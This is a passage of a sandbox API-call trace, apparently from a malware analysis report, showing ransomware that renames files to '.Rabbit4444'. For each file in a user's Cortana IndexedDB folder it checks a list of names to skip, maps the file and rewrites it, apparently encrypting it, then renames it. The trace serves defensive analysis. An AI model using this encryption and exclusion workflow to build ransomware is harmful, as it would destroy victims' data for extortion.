hHeap=0xe0000) returned 1 [0070.388] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0070.388] UnmapViewOfFile (lpBaseAddress=0x2b0000) returned 1 [0070.393] CloseHandle (hObject=0x27c) returned 1 [0070.393] CloseHandle (hObject=0x260) returned 1 [0070.393] wsprintfW (in: param_1=0x11cc050, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edb.log.Rabbit4444") returned 116 [0070.393] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edb.log" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\appdata\\indexed db\\edb.log"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edb.log.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\appdata\\indexed db\\edb.log.rabbit4444"), dwFlags=0x1) returned 1 [0070.394] InterlockedExchangeAdd (in: Addend=0xff5a0, Value=524288 | out: Addend=0xff5a0) returned 8192 [0070.394] InterlockedExchangeAdd (in: Addend=0xff5ac, Value=34 | out: Addend=0xff5ac) returned 16 [0070.394] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x11cdd70 | out: lpFindFileData=0x11cdd70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x323353b6, ftCreationTime.dwHighDateTime=0x1d32716, ftLastAccessTime.dwLowDateTime=0x7affe9be, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0x24d4cff, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x0, dwReserved1=0x0, cFileName="edb00007.log", cAlternateFileName="")) returned 1 [0070.394] lstrcmpiW (lpString1="edb00007.log", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.394] lstrcmpiW (lpString1="edb00007.log", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.394] lstrcmpiW (lpString1="edb00007.log", lpString2="Rabbit4444.exe") returned -1 [0070.394] lstrcmpiW (lpString1="edb00007.log", lpString2=".") returned 1 [0070.394] lstrcmpiW (lpString1="edb00007.log", lpString2="..") returned 1 [0070.394] lstrcmpiW (lpString1="edb00007.log", lpString2="windows") returned -1 [0070.394] lstrcmpiW (lpString1="edb00007.log", lpString2="bootmgr") returned 1 [0070.394] lstrcmpiW (lpString1="edb00007.log", lpString2="pagefile.sys") returned -1 [0070.394] lstrcmpiW (lpString1="edb00007.log", lpString2="boot") returned 1 [0070.394] lstrcmpiW (lpString1="edb00007.log", lpString2="ids.txt") returned -1 [0070.394] lstrcmpiW (lpString1="edb00007.log", lpString2="NTUSER.DAT") returned -1 [0070.394] lstrcpyW (in: lpString1=0x11ce984, lpString2="edb00007.log" | out: lpString1="edb00007.log") returned="edb00007.log" [0070.394] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edb00007.log", dwFileAttributes=0x0) returned 1 [0070.400] lstrlenW (lpString="edb00007.log") returned 12 [0070.400] lstrlenW (lpString="Rabbit4444") returned 10 [0070.400] lstrcmpiW (lpString1="b00007.log", lpString2="Rabbit4444") returned -1 [0070.400] lstrlenW (lpString=".dll") returned 4 [0070.400] lstrcmpiW (lpString1=".log", lpString2=".dll") returned 1 [0070.400] lstrlenW (lpString=".lnk") returned 4 [0070.400] lstrcmpiW (lpString1=".log", lpString2=".lnk") returned 1 [0070.400] lstrlenW (lpString=".ini") returned 4 [0070.400] lstrcmpiW (lpString1=".log", lpString2=".ini") returned 1 [0070.400] lstrlenW (lpString=".sys") returned 4 [0070.400] lstrcmpiW (lpString1=".log", lpString2=".sys") returned -1 [0070.400] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edb00007.log" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\appdata\\indexed db\\edb00007.log"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0070.401] QueryPerformanceFrequency (in: lpFrequency=0x11cbd40 | out: lpFrequency=0x11cbd40*=100000000) returned 1 [0070.401] QueryPerformanceCounter (in: lpPerformanceCount=0x11cbd48 | out: lpPerformanceCount=0x11cbd48*=16171147633) returned 1 [0070.401] GetFileSizeEx (in: hFile=0x228, lpFileSize=0x11cbda0 | out: lpFileSize=0x11cbda0*=524288) returned 1 [0070.401] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1179c8 [0070.401] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0070.401] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x80300, lpName=0x0) returned 0x260 [0070.402] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x80300) returned 0x2b0000 [0070.714] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x127608 [0070.714] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0070.714] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x127608 | out: hHeap=0xe0000) returned 1 [0070.714] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0070.714] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x127608 [0070.714] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0070.714] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x127608 | out: hHeap=0xe0000) returned 1 [0070.714] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0070.714] QueryPerformanceCounter (in: lpPerformanceCount=0x11cbd50 | out: lpPerformanceCount=0x11cbd50*=16202598116) returned 1 [0070.715] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1179c8 | out: hHeap=0xe0000) returned 1 [0070.718] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0070.719] UnmapViewOfFile (lpBaseAddress=0x2b0000) returned 1 [0070.795] CloseHandle (hObject=0x260) returned 1 [0070.795] CloseHandle (hObject=0x228) returned 1 [0071.436] wsprintfW (in: param_1=0x11cc050, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edb00007.log.Rabbit4444") returned 121 [0071.437] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edb00007.log" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\appdata\\indexed db\\edb00007.log"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edb00007.log.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\appdata\\indexed db\\edb00007.log.rabbit4444"), dwFlags=0x1) returned 1 [0071.437] InterlockedExchangeAdd (in: Addend=0xff5a0, Value=524288 | out: Addend=0xff5a0) returned 532480 [0071.438] InterlockedExchangeAdd (in: Addend=0xff5ac, Value=314 | out: Addend=0xff5ac) returned 50 [0071.438] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x11cdd70 | out: lpFindFileData=0x11cdd70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x323353b6, ftCreationTime.dwHighDateTime=0x1d32716, ftLastAccessTime.dwLowDateTime=0x983e23ef, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x481dc8bc, ftLastWriteTime.dwHighDateTime=0x1d327c7, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x0, dwReserved1=0x0, cFileName="edb00008.log", cAlternateFileName="")) returned 1 [0071.438] lstrcmpiW (lpString1="edb00008.log", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0071.438] lstrcmpiW (lpString1="edb00008.log", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0071.438] lstrcmpiW (lpString1="edb00008.log", lpString2="Rabbit4444.exe") returned -1 [0071.438] lstrcmpiW (lpString1="edb00008.log", lpString2=".") returned 1 [0071.438] lstrcmpiW (lpString1="edb00008.log", lpString2="..") returned 1 [0071.438] lstrcmpiW (lpString1="edb00008.log", lpString2="windows") returned -1 [0071.438] lstrcmpiW (lpString1="edb00008.log", lpString2="bootmgr") returned 1 [0071.438] lstrcmpiW (lpString1="edb00008.log", lpString2="pagefile.sys") returned -1 [0071.438] lstrcmpiW (lpString1="edb00008.log", lpString2="boot") returned 1 [0071.438] lstrcmpiW (lpString1="edb00008.log", lpString2="ids.txt") returned -1 [0071.438] lstrcmpiW (lpString1="edb00008.log", lpString2="NTUSER.DAT") returned -1 [0071.438] lstrcpyW (in: lpString1=0x11ce984, lpString2="edb00008.log" | out: lpString1="edb00008.log") returned="edb00008.log" [0071.438] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edb00008.log", dwFileAttributes=0x0) returned 1 [0071.438] lstrlenW (lpString="edb00008.log") returned 12 [0071.438] lstrlenW (lpString="Rabbit4444") returned 10 [0071.438] lstrcmpiW (lpString1="b00008.log", lpString2="Rabbit4444") returned -1 [0071.438] lstrlenW (lpString=".dll") returned 4 [0071.438] lstrcmpiW (lpString1=".log", lpString2=".dll") returned 1 [0071.438] lstrlenW (lpString=".lnk") returned 4 [0071.438] lstrcmpiW (lpString1=".log", lpString2=".lnk") returned 1 [0071.438] lstrlenW (lpString=".ini") returned 4 [0071.438] lstrcmpiW (lpString1=".log", lpString2=".ini") returned 1 [0071.439] lstrlenW (lpString=".sys") returned 4 [0071.439] lstrcmpiW (lpString1=".log", lpString2=".sys") returned -1 [0071.439] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edb00008.log" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\appdata\\indexed db\\edb00008.log"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x29c [0071.439] QueryPerformanceFrequency (in: lpFrequency=0x11cbd40 | out: lpFrequency=0x11cbd40*=100000000) returned 1 [0071.439] QueryPerformanceCounter (in: lpPerformanceCount=0x11cbd48 | out: lpPerformanceCount=0x11cbd48*=16274980800) returned 1 [0071.439] GetFileSizeEx (in: hFile=0x29c, lpFileSize=0x11cbda0 | out: lpFileSize=0x11cbda0*=524288) returned 1 [0071.439] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1179c8 [0071.439] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0071.439] CreateFileMappingW (hFile=0x29c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x80300, lpName=0x0) returned 0x2d0 [0071.440] MapViewOfFile (hFileMappingObject=0x2d0, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x80300) returned 0x2b0000 [0071.456] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x1102a0 [0071.456] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0071.456] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1102a0 | out: hHeap=0xe0000) returned 1 [0071.456] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0071.456] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x115180 [0071.457] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0071.457] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115180 | out: hHeap=0xe0000) returned 1 [0071.457] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0071.457] QueryPerformanceCounter (in: lpPerformanceCount=0x11cbd50 | out: lpPerformanceCount=0x11cbd50*=16276761006) returned 1 [0071.457] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1179c8 | out: hHeap=0xe0000) returned 1 [0071.457] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0071.457] UnmapViewOfFile (lpBaseAddress=0x2b0000) returned 1 [0071.462] CloseHandle (hObject=0x2d0) returned 1 [0071.462] CloseHandle (hObject=0x29c) returned 1 [0071.462] wsprintfW (in: param_1=0x11cc050, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edb00008.log.Rabbit4444") returned 121 [0071.462] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edb00008.log" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\appdata\\indexed db\\edb00008.log"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edb00008.log.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\appdata\\indexed db\\edb00008.log.rabbit4444"), dwFlags=0x1) returned 1 [0071.463] InterlockedExchangeAdd (in: Addend=0xff5a0, Value=524288 | out: Addend=0xff5a0) returned 1056768 [0071.463] InterlockedExchangeAdd (in: Addend=0xff5ac, Value=17 | out: Addend=0xff5ac) returned 364 [0071.463] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x11cdd70 | out: lpFindFileData=0x11cdd70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x323353b6, ftCreationTime.dwHighDateTime=0x1d32716, ftLastAccessTime.dwLowDateTime=0x323353b6, ftLastAccessTime.dwHighDateTime=0x1d32716, ftLastWriteTime.dwLowDateTime=0xea54d171, ftLastWriteTime.dwHighDateTime=0x1d35e03, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x0, dwReserved1=0x0, cFileName="edb00009.log", cAlternateFileName="")) returned 1 [0071.463] lstrcmpiW (lpString1="edb00009.log", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0071.463] lstrcmpiW (lpString1="edb00009.log", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0071.463] lstrcmpiW (lpString1="edb00009.log", lpString2="Rabbit4444.exe") returned -1 [0071.463] lstrcmpiW (lpString1="edb00009.log", lpString2=".") returned 1 [0071.463] lstrcmpiW (lpString1="edb00009.log", lpString2="..") returned 1 [0071.463] lstrcmpiW (lpString1="edb00009.log", lpString2="windows") returned -1 [0071.463] lstrcmpiW (lpString1="edb00009.log", lpString2="bootmgr") returned 1 [0071.463] lstrcmpiW (lpString1="edb00009.log", lpString2="pagefile.sys") returned -1 [0071.463] lstrcmpiW (lpString1="edb00009.log", lpString2="boot") returned 1 [0071.463] lstrcmpiW (lpString1="edb00009.log", lpString2="ids.txt") returned -1 [0071.463] lstrcmpiW (lpString1="edb00009.log", lpString2="NTUSER.DAT") returned -1 [0071.463] lstrcpyW (in: lpString1=0x11ce984, lpString2="edb00009.log" | out: lpString1="edb00009.log") returned="edb00009.log" [0071.463] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edb00009.log", dwFileAttributes=0x0) returned 1 [0071.465] lstrlenW (lpString="edb00009.log") returned 12 [0071.465] lstrlenW (lpString="Rabbit4444") returned 10 [0071.465] lstrcmpiW (lpString1="b00009.log", lpString2="Rabbit4444") returned -1 [0071.465] lstrlenW (lpString=".dll") returned 4 [0071.465] lstrcmpiW (lpString1=".log", lpString2=".dll") returned 1 [0071.465] lstrlenW (lpString=".lnk") returned 4 [0071.465] lstrcmpiW (lpString1=".log", lpString2=".lnk") returned 1 [0071.465] lstrlenW (lpString=".ini") returned 4 [0071.465] lstrcmpiW (lpString1=".log", lpString2=".ini") returned 1 [0071.465] lstrlenW (lpString=".sys") returned 4 [0071.465] lstrcmpiW (lpString1=".log", lpString2=".sys") returned -1 [0071.465] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edb00009.log" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\appdata\\indexed db\\edb00009.log"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x29c [0071.465] QueryPerformanceFrequency (in: lpFrequency=0x11cbd40 | out: lpFrequency=0x11cbd40*=100000000) returned 1 [0071.465] QueryPerformanceCounter (in: lpPerformanceCount=0x11cbd48 | out: lpPerformanceCount=0x11cbd48*=16277624541) returned 1 [0071.466] GetFileSizeEx (in: hFile=0x29c, lpFileSize=0x11cbda0 | out: lpFileSize=0x11cbda0*=524288) returned 1 [0071.466] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117770 [0071.466] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0071.466] CreateFileMappingW (hFile=0x29c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x80300, lpName=0x0) returned 0x2d0 [0071.467] MapViewOfFile (hFileMappingObject=0x2d0, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x80300) returned 0x2b0000 [0071.491] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x110df8 [0071.491] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0071.491] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x110df8 | out: hHeap=0xe0000) returned 1 [0071.491] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0071.491] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x115180 [0071.492] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0071.492] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115180 | out: hHeap=0xe0000) returned 1 [0071.492] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0071.492] QueryPerformanceCounter (in: lpPerformanceCount=0x11cbd50 | out: lpPerformanceCount=0x11cbd50*=16280241115) returned 1 [0071.492] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117770 | out: hHeap=0xe0000) returned 1 [0071.492] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0071.492] UnmapViewOfFile (lpBaseAddress=0x2b0000) returned 1 [0071.496] CloseHandle (hObject=0x2d0) returned 1 [0071.496] CloseHandle (hObject=0x29c) returned 1 [0071.497] wsprintfW (in: param_1=0x11cc050, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edb00009.log.Rabbit4444") returned 121 [0071.497] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edb00009.log" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\appdata\\indexed db\\edb00009.log"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edb00009.log.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\appdata\\indexed db\\edb00009.log.rabbit4444"), dwFlags=0x1) returned 1 [0071.497] InterlockedExchangeAdd (in: Addend=0xff5a0, Value=524288 | out: Addend=0xff5a0) returned 1581056 [0071.498] InterlockedExchangeAdd (in: Addend=0xff5ac, Value=26 | out: Addend=0xff5ac) returned 381 [0071.498] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x11cdd70 | out: lpFindFileData=0x11cdd70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3235b602, ftCreationTime.dwHighDateTime=0x1d32716, ftLastAccessTime.dwLowDateTime=0x3235b602, ftLastAccessTime.dwHighDateTime=0x1d32716, ftLastWriteTime.dwLowDateTime=0x3235b602, ftLastWriteTime.dwHighDateTime=0x1d32716, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x0, dwReserved1=0x0, cFileName="edbres00001.jrs", cAlternateFileName="EDBRES~1.JRS")) returned 1 [0071.498] lstrcmpiW (lpString1="edbres00001.jrs", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0071.498] lstrcmpiW (lpString1="edbres00001.jrs", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0071.498] lstrcmpiW (lpString1="edbres00001.jrs", lpString2="Rabbit4444.exe") returned -1 [0071.498] lstrcmpiW (lpString1="edbres00001.jrs", lpString2=".") returned 1 [0071.498] lstrcmpiW (lpString1="edbres00001.jrs", lpString2="..") returned 1 [0071.498] lstrcmpiW (lpString1="edbres00001.jrs", lpString2="windows") returned -1 [0071.498] lstrcmpiW (lpString1="edbres00001.jrs", lpString2="bootmgr") returned 1 [0071.498] lstrcmpiW (lpString1="edbres00001.jrs", lpString2="pagefile.sys") returned -1 [0071.498] lstrcmpiW (lpString1="edbres00001.jrs", lpString2="boot") returned 1 [0071.498] lstrcmpiW (lpString1="edbres00001.jrs", lpString2="ids.txt") returned -1 [0071.498] lstrcmpiW (lpString1="edbres00001.jrs", lpString2="NTUSER.DAT") returned -1 [0071.498] lstrcpyW (in: lpString1=0x11ce984, lpString2="edbres00001.jrs" | out: lpString1="edbres00001.jrs") returned="edbres00001.jrs" [0071.498] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edbres00001.jrs", dwFileAttributes=0x0) returned 1 [0071.511] lstrlenW (lpString="edbres00001.jrs") returned 15 [0071.511] lstrlenW (lpString="Rabbit4444") returned 10 [0071.511] lstrcmpiW (lpString1="s00001.jrs", lpString2="Rabbit4444") returned 1 [0071.511] lstrlenW (lpString=".dll") returned 4 [0071.511] lstrcmpiW (lpString1=".jrs", lpString2=".dll") returned 1 [0071.511] lstrlenW (lpString=".lnk") returned 4 [0071.511] lstrcmpiW (lpString1=".jrs", lpString2=".lnk") returned -1 [0071.511] lstrlenW (lpString=".ini") returned 4 [0071.511] lstrcmpiW (lpString1=".jrs", lpString2=".ini") returned 1 [0071.511] lstrlenW (lpString=".sys") returned 4 [0071.512] lstrcmpiW (lpString1=".jrs", lpString2=".sys") returned -1 [0071.512] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edbres00001.jrs" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\appdata\\indexed db\\edbres00001.jrs"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0071.512] QueryPerformanceFrequency (in: lpFrequency=0x11cbd40 | out: lpFrequency=0x11cbd40*=100000000) returned 1 [0071.512] QueryPerformanceCounter (in: lpPerformanceCount=0x11cbd48 | out: lpPerformanceCount=0x11cbd48*=16282274358) returned 1 [0071.512] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x11cbda0 | out: lpFileSize=0x11cbda0*=524288) returned 1 [0071.512] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1177e8 [0071.512] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c00 [0071.512] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x80300, lpName=0x0) returned 0x27c [0071.513] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x80300) returned 0x2b0000 [0071.528] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x1105b8 [0071.528] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0071.528] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1105b8 | out: hHeap=0xe0000) returned 1 [0071.528] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0071.528] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11d948 [0071.528] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0071.528] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11d948 | out: hHeap=0xe0000) returned 1 [0071.528] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0071.528] QueryPerformanceCounter (in: lpPerformanceCount=0x11cbd50 | out: lpPerformanceCount=0x11cbd50*=16283876420) returned 1 [0071.528] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1177e8 | out: hHeap=0xe0000) returned 1 [0071.528] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c00 | out: hHeap=0xe0000) returned 1 [0071.528] UnmapViewOfFile (lpBaseAddress=0x2b0000) returned 1 [0071.533] CloseHandle (hObject=0x27c) returned 1 [0071.533] CloseHandle (hObject=0x260) returned 1 [0071.533] wsprintfW (in: param_1=0x11cc050, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edbres00001.jrs.Rabbit4444") returned 124 [0071.533] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edbres00001.jrs" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\appdata\\indexed db\\edbres00001.jrs"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edbres00001.jrs.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\appdata\\indexed db\\edbres00001.jrs.rabbit4444"), dwFlags=0x1) returned 1 [0071.534] InterlockedExchangeAdd (in: Addend=0xff5a0, Value=524288 | out: Addend=0xff5a0) returned 2105344 [0071.534] InterlockedExchangeAdd (in: Addend=0xff5ac, Value=16 | out: Addend=0xff5ac) returned 407 [0071.534] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x11cdd70 | out: 